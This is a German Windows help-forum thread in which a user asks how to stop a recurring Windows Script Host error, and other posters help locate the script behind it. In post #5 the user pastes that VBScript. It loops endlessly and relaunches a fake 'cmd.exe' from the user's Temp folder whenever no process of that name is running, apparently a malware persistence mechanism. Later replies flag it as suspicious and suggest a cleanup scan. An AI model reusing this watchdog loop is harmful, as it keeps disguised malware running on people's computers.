Ergebnis 1 bis 8 von 8

Thema: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

  1. #1
    Rickenbacker
    kennt sich schon aus

    Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Hallo zusammen,

    seit kurzem bekomme ich diese


    Fehlermeldung angezeigt. OK anklicken nützt nichts, nach einigen Sekunden ist die Meldung wieder da. Im Ordner habe ich die Datei gelöscht, aber sie wird immer wieder erzeugt. Öffnen lässt sie sich nicht. Größe: 1K. Eigenschaften: es wird der ganze Benutzerordner angezeigt.

    Wie bekomme ich das Ding weg?




    Danke!

    R.
    Angehängte Dateien Angehängte Dateien

  2. #2
    areiland
    Computer Legastheniker Avatar von areiland

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Und warum bitte verpackst Du Deinen Screenshot in ein Word Dokument? Sowas hängt man fairerweise direkt an und zwingt die Leute nicht dazu, erst irgendwas downloaden zu müssen.

    Irgendwas wird da wohl ein Script starten, das nicht korrekt geschrieben wurde. Denn die Fehlermeldung weist darauf hin, dass der übergebene Pfad nicht korrekt ausgewertet wird. Oder gibt es bei Dir den Ordner "C:\Users\K" (im Explorer wäre das der Ordner C:\Benutzer\K)? Ich gehe mal davon aus, dass es einen Ordner "C:\Benutzer\K irgendwas weiter" gibt, das Script am Leerzeichen nach "\K" scheitert und deshalb diese Fehlermeldung erbringt.

    Der Taskmanager sollte auf dem Tab "Details" das Script nennen. Du kannst Dir dort mit einem Rechtsklick in den Spaltenkopf, über die Auswahl "Spalten auswählen", zusätzlich noch die Spalte "Befehlszeile" einblenden lassen. Die nennt dann auch den genauen Ort und Namen dieses Scriptes.

  3. #3
    Rickenbacker
    kennt sich schon aus

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Vielen Dank, den Screenshot habe ich in ein Word-Dokument verpackt, weil ich es nicht anders weis (meine Talente liegen in anderen Bereichen). Wie im Titel beschrieben gibt es einen Ordner "C:\Users\K" wobei die Bezeichnungen "User" und "Benutzer" alternieren. "K irgendwas weiter" existiert allerdings nicht und hat auch früher nie existiert.

    Das beschriebene Script habe ich gefunden, muss ich da etwas machen? Leerzeichen im Ordner "C:\Users\K " bringen nichts.

    Danke

    R.

  4. #4
    Lajoe
    nicht mehr wegzudenken Avatar von Lajoe

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Screenshots kannst du einfach mit dem in Windows 10 enthaltenen "Snipping Tool" erstellen und diese als .jpg oder .png abspeichern.

    Zum Script, ist das ein von dir selbst geschriebenes? Was steht in dem Script, was soll damit bewirkt werden? Welche Benutzer gib es, sind bei den Benutzernamen evtl. Leerzeichen enthalten?

  5. #5
    Rickenbacker
    kennt sich schon aus

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Nein, so etwas kann ich nicht schreiben, da ist Maya ja verständlicher. Keine Ahnung was es bewirken soll. Ich bin der einzige Benutzer. Die R R R stehen mit Leerzeichen als Klarname drin:

    On error resume next
    Dim strComputer,strProcess,fileset
    strProcess = "cmd.exe"
    fileset = """C:\Users\R R R\AppData\Local\Temp\cmd.exe"""
    strComputer = "."
    Dim objShell
    Set objShell = CreateObject("WScript.Shell")
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    while 1
    IF isProcessRunning(strComputer,strProcess) THEN
    ELSE
    objShell.Run fileset
    END IF
    Wend
    FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)
    DIM objWMIService, strWMIQuery
    strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"
    SET objWMIService = GETOBJECT("winmgmts:" _
    & "{impersonationLevel=impersonate}!\" _
    & strComputer & "\root\cimv2")
    IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN
    isProcessRunning = TRUE
    ELSE
    isProcessRunning = FALSE
    END IF
    END FUNCTION


    Was ist ein "Snipping Tool"?

    Danke

    R.

  6. #6
    Ponderosa
    Windows-Cowboy Avatar von Ponderosa

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Was ist ein "Snipping Tool"?
    Windows Taste drücken > Snipping eingeben.
    Das ist ein Screenshot Tool von Microsoft.
    Und Bilder einstellen geht so, siehe Bild2
    Windows Script Host  -  "C:\Users\K" hat keine Dateierweiterung.-snipping.jpg____Windows Script Host  -  "C:\Users\K" hat keine Dateierweiterung.-bild-hochladen.jpg

  7. #7
    Lajoe
    nicht mehr wegzudenken Avatar von Lajoe

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Script schaut für mich dubios aus.
    Lade dir mal AdwCleaner herunter und mach einen Scan, nicht blind alles löschen, was gefunden wurde! Alles schön durchlesen und bei bekannten Dateien den Haken weg.

  8. #8
    .Bernd
    gehört zum Inventar Avatar von .Bernd

    AW: Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

    Sieht mir auch richtig übel aus, da wird cmd.exe umgeleitet.

    https://docs.microsoft.com/en-us/win...onation-levels
    CIMV2
    https://docs.microsoft.com/en-us/win...g-a-wmi-script

    Das folgende Beispiel sollte passen, da wird ein Prozess gesucht:
    https://stackoverflow.com/questions/...th-screensaver
    Und da cmd.exe nicht in c:\windows\system32 aufgerufen wird, ist das sehr verdächtig, allein schon, wegen User "k...", den es bei dir nicht gibt.

Lesezeichen


  • An Google übertragen Google
  • -->

    Berechtigungen

    • Neue Themen erstellen: Nein
    • Themen beantworten: Nein
    • Anhänge hochladen: Nein
    • Beiträge bearbeiten: Nein
    •